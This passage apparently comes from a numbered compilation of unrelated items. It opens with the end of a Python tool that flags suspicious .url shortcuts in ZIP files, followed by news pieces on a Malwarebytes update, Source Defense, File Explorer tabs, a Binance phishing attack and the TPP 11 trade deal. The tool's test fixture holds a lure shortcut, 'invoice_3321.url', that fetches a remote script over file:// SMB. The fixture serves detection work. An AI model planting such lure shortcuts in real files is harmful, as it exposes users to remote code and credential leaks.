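def triage_zip(zip_bytes: bytes):
    """Assess every .url inside a ZIP held in memory; list of (name, verdict, reason)."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue
            verdict, reason = assess_target(parse_url_shortcut(zf.read(info)))
            results.append((info.filename, verdict, reason))
    return results


def build_sample_zip():
    """Constructed attachment: one SMB-fetching shortcut, one ordinary one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_3321.url",
                    "[InternetShortcut]\r\nURL=file://198.51.100.7/share/invoice.js\r\n")
        zf.writestr("receipt.url",
                    "[InternetShortcut]\r\nURL=https://example.com/receipt\r\n")
        zf.writestr("readme.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for name, verdict, reason in triage_zip(build_sample_zip()):
        print(f"{name}: {verdict} ({reason})")
```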
  21. Malwarebytes has released a new version of their flagship product, Malwarebytes 3.4.4, that includes enhanced detection and cleaning engines, an updated user interface, more useful notifications, and a fix for the damn stacked notifications bug. If you are already using Malwarebytes, the next time you perform an update, it will alert you that a new version is ready to download.

What has changed under the hood

The changes that are really important are under the hood as part of the scanning engine. This includes better detection and cleaning of hijacked shortcuts, including browser shortcuts, and of scheduled tasks that launch malware or web pages. Both of these methods have become more common for adware, hijackers, and miners to utilize as a way to launch their payloads.

Another change is improved detection and cleaning of systems that are heavily infected with malware. If a system becomes bogged down with adware, trojans, PUPs, and miners, the performance of Malwarebytes will suffer greatly. This change supposedly increases the performance of scans on these types of systems. I have not been able to test this myself, though, so we will need to see if this update makes much of a difference.

User interface changes

The more noticeable changes are in the user interface. With this release, we have some UI bug fixes, changes in how notifications are displayed, a new detection reports screen, and a notifications center.

Stacking notifications fixed

One of the items that I am very happy to see resolved is the notification stacking issue. In the past this would cause notifications for the same thing to stack over time. So if you were away from your computer for an extended period of time, you would be greeted with multiple notifications for the same issue that you would need to close independently.

New website blocked notification

Another change is a new design for the website blocked notification alerts.
The older alerts were uglier and contained little information as to why the site was blocked. The new alert is cleaner looking and now contains the reason why the site was blocked.

Old Notification / New Notification

New detection reports interface

The reports for detected items have also been given a facelift. In the past all the details for the detected item were put in one screen of the report. With version 3.4.4, the first page of the report now contains basic information, and you can click on the Advanced tab to see more detailed information. You can click on the images below to see what the reports look like in greater detail.

New Report Screen / Separate advanced details page

Notifications Center

As notifications in Malwarebytes are set to disappear by default after a short period of time, it is not uncommon to miss a notification. With this version, Malwarebytes introduced a new Notifications Center that can be used to see the latest notifications displayed by Malwarebytes.

Malwarebytes Notification Center

For a complete list of changes in Malwarebytes 3.4.4, you can view the changelog below.
Performance/protective capability
• Improved remediation for shortcuts and tasks
• Added better handling for heavily infected systems to streamline detection & remediation
• Continued improvements to overall protection, detection and remediation

Usability
• Added Notification Center for easy access to most recent real-time block notifications (NOTE: you will see this in dashboard header, but currently it won't display for first time until after a real-time block event has occurred)
• Added category to website blocked notification to show the reason why site was blocked
• Improved report design for better usability
• Added device name to My Account screen in preparation to sync with My Account portal
• Updated the API used to interact with Windows Action/Security Center
• Changed the 'Recover if missed by' setting for Scheduled Scans to be enabled by default for new scans
• Numerous other user interface and copy improvements

Stability/issues fixed
• Fixed issue where files did not save properly with anti-ransomware enabled
• Fixed issue where notifications could stack so you might see multiple versions of same message
• Fixed issue where Beta opt in setting would not honor Restore Defaults
• Updated the 7-Zip library to the latest version, v.18.01
• Improved upgrade process from earlier versions of Malwarebytes
• Continued improvements to driver operation and management
• Fixed several crashes, including a blue screen related to Web Protection
• Addressed other miscellaneous defects
  22. While most of today's banks and e-commerce sites have their front doors locked, there's a side door that many still leave open: connections to third party scripts. We caught up with Hadar Blutrich, CEO of Israeli startup Source Defense, to hear about the solution that his team has cooked up to take control of these scripts. You can watch the video interview above or read the transcript below.

Blutrich told ZDNet, "While creating Source Defense, we found out that almost any website in the world can be hacked using the third party scripts on the page. It doesn't matter if it's a bank, or if it's an e-commerce [site], or any other type of website. We were able to demonstrate that when we are hacking one of the third parties, we are able to get full accessibility to the page, change the page, add information to the page, and get any information back, including user credentials, including manipulating the [buyer's] order to buy...

"We saw a text from an analytic program that the user doesn't even know about them. We saw a text from advertisement. We even saw a latest attack using an accessibility program into the website. More than 4,000 different websites, government websites were compromised last month because of an attack to a third party that helped people with disabilities to access the websites."

He continued, "The problem with the third parties is that everything happening in those third party scripts is happening in the client side. Which means that all of the measures of defense, of cyberdefense that a website has, are being done by that time. You are finished with the firewall, you finished with the SSL, and only then you are calling those third parties. It means that the bank has no visibility to what they are doing on the page and don't have any way to prevent them from doing stuff that they are not supposed to do.

"Source Defense is creating what we call virtual pages.
We are isolating the different third parties into virtual pages in the memory of the browser. Each one of those third parties is being run on the virtual page and can only see information that is allowed for it to see. When that same third party is trying to write information back to the page, we decide which part of it should be reflected back to the page and which should not."

Blutrich added, "For example, if a third party is trying to get access to the user name and password in the virtual page, the user name and password will never appear. He will not be able to see them in the virtual pages. If a third party is trying to write information to the page such as 'naughty poo propaganda,' we can prevent it from appearing in the real page.

"It really depends on the industry and on the type of the page, but we can see between five different third parties to sometimes 120 third parties. It basically means that you have 120 different open doors on the page, that if a hacker gets into them you will not even know that he was able to get access to the website.

"In a lot of the cases, third parties are slowing up the page. The reason is that the third party is loading synchronically and the page waits for it to be loaded. With Source Defense, what happened as a byproduct is that all of the third parties have been loaded into the virtual pages and therefore the actual page that you are looking at is loading faster in most cases."
  23. One of the most requested features that Windows 10 Insiders have been asking for is the addition of tabs to File Explorer. Well, yesterday, for those 22 thousand+ insiders who voted for this feature, Microsoft released Insider Preview Build 17618, which includes tabs in File Explorer as part of its Sets feature!

Windows 10 Sets is an upcoming feature where you can group documents and apps that are related to the particular task at hand into one tabbed window. This feature was released for testing to a small controlled group of insiders in Insider Preview Build 17063 and was subsequently removed after the test.

[embedded content]

With build 17618, Sets are back, and with them come tabs in File Explorer. You can now open different folders in the same File Explorer window, with each one having its own tab. This way one File Explorer window can have a tab for the pictures folder, a tab for the documents folder, and a tab for your downloads, which you can easily switch between.

Tabs in File Explorer as part of the Sets Feature

If you look closely, though, the Sets feature does more than just allow you to have different tabs for different folders; it also allows you to add applications as a tab in File Explorer. According to Microsoft, in addition to File Explorer, Notepad, Command Prompt, and PowerShell are also getting tabbed support.

While this may be useful to some, I would personally have preferred that tabs in File Explorer be limited to folders and libraries. I do not need a tab for Word or Edge in File Explorer.

Unfortunately, as I am not on the Skip Ahead ring, I won't be able to test this feature and see how it works. For those of you who are, please let us know your experiences and whether this is the tabbed File Explorer you have been waiting for.
  24. Binance, one of the largest cryptocurrency exchanges on the Internet, said today that hackers and a well-executed phishing campaign are to blame for the Bitcoin sell-offs from yesterday afternoon.

The incident the company is referring to happened late yesterday afternoon (Mar 7, UTC 14:58-14:59), when thousands of user accounts started selling their Bitcoin and buying an altcoin named Viacoin (VIA). The incident looked like a hack, and users reacted accordingly, with many complaining on social media, such as Twitter and Reddit.

"Wtf??? All my coins got sold and I brought [Viacoin]? Did I just get hacked?," a Reddit user wailed.

But this wasn't a hack, or at least not your ordinary hack. The way this was done was incredibly clever.

Hackers ran a two-month phishing campaign

According to an incident report published by the Binance team, in preparation for yesterday's attack, the hackers ran a two-month phishing scheme to collect Binance user account credentials.

Hackers used a homograph attack by registering a domain identical to binance.com, but spelled with Latin-lookalike Unicode characters. Specifically, hackers registered the bịnạnce.com domain; notice the tiny dots under the "i" and "a" characters.

Phishing attacks started in early January, but the Binance team says it detected evidence that operations ramped up around February 22, when the campaign reached its peak.

Binance tracked down this phishing campaign because the phishing pages would immediately redirect phished users to the real Binance login page. This left a forensic trail in referral logs that Binance developers detected. The company's CEO shared a screenshot of one of these logs on Twitter yesterday.

Hackers gained access to accounts and generated API keys

After getting access to several accounts, instead of using the login credentials to empty out wallets, hackers created "trading API keys" for each account. With the API keys in hand, hackers sprang their main attack yesterday.
Crooks used the API keys to automate transactions that sold Bitcoin held in compromised Binance accounts and automatically bought Viacoin from 31 other Binance accounts that hackers had created beforehand, and where they had deposited Viacoin, ready to be bought.

But the hackers didn't know about one thing, Binance's secret weapon: an internal risk management system that detected the abnormal volume of Bitcoin-Viacoin sale orders within the span of two minutes and blocked all transactions on the platform.

For once, it was the hackers who lost money

Hackers tried to cash out the 31 Binance accounts, but by that point, Binance had blocked all withdrawals. Furthermore, in the subsequent investigation, Binance identified the 31 accounts, reversed all transactions, and confiscated the original Viacoin funds that hackers had deposited in the accounts.

So, in the end, the hackers actually lost both money and time carrying out this attempted heist. How much they lost is currently unknown.
  25. Eleven Pacific countries have signed the Trans-Pacific Partnership trade pact, pushing ahead with the deal without America.

Trade Minister Steve Ciobo is optimistic the Comprehensive and Progressive Agreement for Trans-Pacific Partnership (TPP 11) trade pact will take effect by the end of the year after Australia signed on to the jobs-boosting 11-country deal. The deal will eliminate 98 percent of tariffs in a marketplace worth close to $14 trillion.

Speaking at the signing ceremony in Chile, Ciobo said the legislation to formalise the pact would be introduced to parliament this month ahead of a joint standing committee inquiry into the TPP. He expects Australia's domestic processes to be settled by the end of September.

"This is a very good day for trade," Ciobo told a media conference in Santiago. "We are sending a mutual signal that we recognise the policy orthodoxy of trade."

The deal had been on life support after the United States' withdrawal but was resuscitated in January following lobbying from Japan and Australia.

"The world will be drinking more Australian wine, eating more Australian beef, and using more Australian services thanks to the TPP 11," Ciobo said.

Ciobo said several other countries had expressed "peripheral interest" in joining the TPP. Speculation has rested on Indonesia, Thailand, Britain, and Colombia.

He said Australian farmers, manufacturers, service providers, and small businesses would be the big winners. Australian exporters would benefit from new trade agreements with Canada and Mexico and greater market access to Japan, Chile, Singapore, Malaysia, Vietnam, and Brunei.

Last month, the New Zealand government published the intellectual property chapter of the TPP 11, which detailed the safe harbour and fair use clauses agreed to between the parties, similar to those found in the foundered original TPP.
The agreement sets out enforcement obligations against the infringement of copyright, including civil and criminal penalties with an aim of deterring future piracy, as well as civil remedies and compensation.

"Each party shall provide that in civil judicial proceedings, its judicial authorities have the authority at least to order the infringer to pay the right holder damages adequate to compensate for the injury the right holder has suffered," it says.

Criminal penalties are set out for cases of piracy on a commercial scale. The agreement gives ISPs safe harbour against piracy actions for providing connections, automated caching, storage, and referring or linking of users to online locations.

"This framework of legal remedies and safe harbours shall include: Legal incentives for internet service providers to cooperate with copyright owners to deter the unauthorised storage and transmission of copyrighted materials or, in the alternative, to take other action to deter the unauthorised storage and transmission of copyrighted materials," the agreement states.

Ciobo confirmed there was a side deal with Canada for the phase-out of tariffs on beef exports over five years. There is also a better deal for Australian cheese and beef exports to Japan, and new quotas for rice and wheat. Australian sugar would also have better access to Japan, Canada, and Mexico's markets.

The TPP deal covers Australia, Brunei, Canada, Chile, Japan, Malaysia, Mexico, New Zealand, Peru, Singapore, and Vietnam.

It comes as the US president signalled Australia may be exempt from a 25 percent tariff on steel and a 10 percent tariff on aluminium imports. Trump is expected to announce his tariff plans at the White House on Friday morning. The president singled out Australia, with praise for the "very close" relationship between the two countries, after indicating he would be flexible with the detail of the penalties.
Australian Prime Minister Malcolm Turnbull, who had been lobbying for an exemption, argued the TPP signing was an important statement in the cause of trade liberalisation.

"A huge demonstration of our relentless commitment to getting every export opportunity made available for Australian businesses," Turnbull said.

Following the withdrawal of the United States in January last year, at least half of the nations involved in the TPP have said they would instead consider Chinese-led multilateral trade deals such as the RCEP.

In recent months, the United States has stepped up its anti-Chinese rhetoric, particularly in the realm of technology. In February, the heads of the CIA, FBI, NSA, and the director of national intelligence recommended to the Senate Intelligence Committee that Americans not use products from Huawei and ZTE.

"We're deeply concerned about the risks of allowing any company or entity that is beholden to foreign governments that don't share our values to gain positions of power inside our telecommunications networks," FBI Director Chris Wray said at the time. "That provides the capacity to exert pressure or control over our telecommunications infrastructure. It provides the capacity to maliciously modify or steal information. And it provides the capacity to conduct undetected espionage."

Earlier this week, the Committee on Foreign Investment in the US (CFIUS) said the attempts by Broadcom to purchase Qualcomm could pose a risk to the national security of the United States. CFIUS stated that should Broadcom take control, it could weaken Qualcomm and allow China to have greater influence over standards like 5G.

With AAP